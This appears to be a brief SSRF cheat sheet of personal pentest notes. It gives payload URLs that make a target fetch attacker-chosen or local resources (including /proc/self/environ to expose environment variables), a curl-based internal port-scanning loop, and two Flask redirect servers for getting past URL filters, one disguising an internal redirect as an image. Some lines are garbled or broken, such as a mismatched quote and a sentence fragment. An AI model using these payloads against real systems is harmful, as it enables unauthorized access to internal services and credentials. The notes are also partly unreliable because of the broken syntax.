It occurs when an application accepts input from the user (URL, GET, POST, HEADER, PARAMETER, etc.), which is not properly verified, to make HTTP requests to another internal or external resource.
Types: In-Band and Blind.
Payload
Remote files
http://<TARGET>/load?q=http://<IP>:<PORT>
Local files
http://<TARGET>/load?q=file://<ABSOLUTE_PATH>
http://<TARGET>/load?q=file:///proc/self/environ # environment variables, like pwd
Port Scanning
for port in {1..65535};do echo $port >> ports.txt; done
curl -i -s "http://<TARGET_IP>/load?q=http://127.0.0.1:1”
# recovery length closed door
from flask import Flask, redirect
app = Flask(__name__)
@app.route('/')
def redirect_to_new_page():
return redirect('<TARGET_SITE>', code=302)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=80)
from flask import Flask, redirect, make_response
app = Flask(__name__)
@app.route('/')
def index():
# Create a response with a redirect and set the desired content type.
response = make_response(redirect('http://0.0.0.0/internal.php'))
response.headers['Content-Type'] = 'image/png'
return response
if __name__ == '__main__':
app.run(debug=True)
DNS Rebinding
Inconsistencies on URL Parser
Set up a DNS server that performs constant switching between two IPs.
Use , set up the two ip's for continuous switching, get the domain to use.
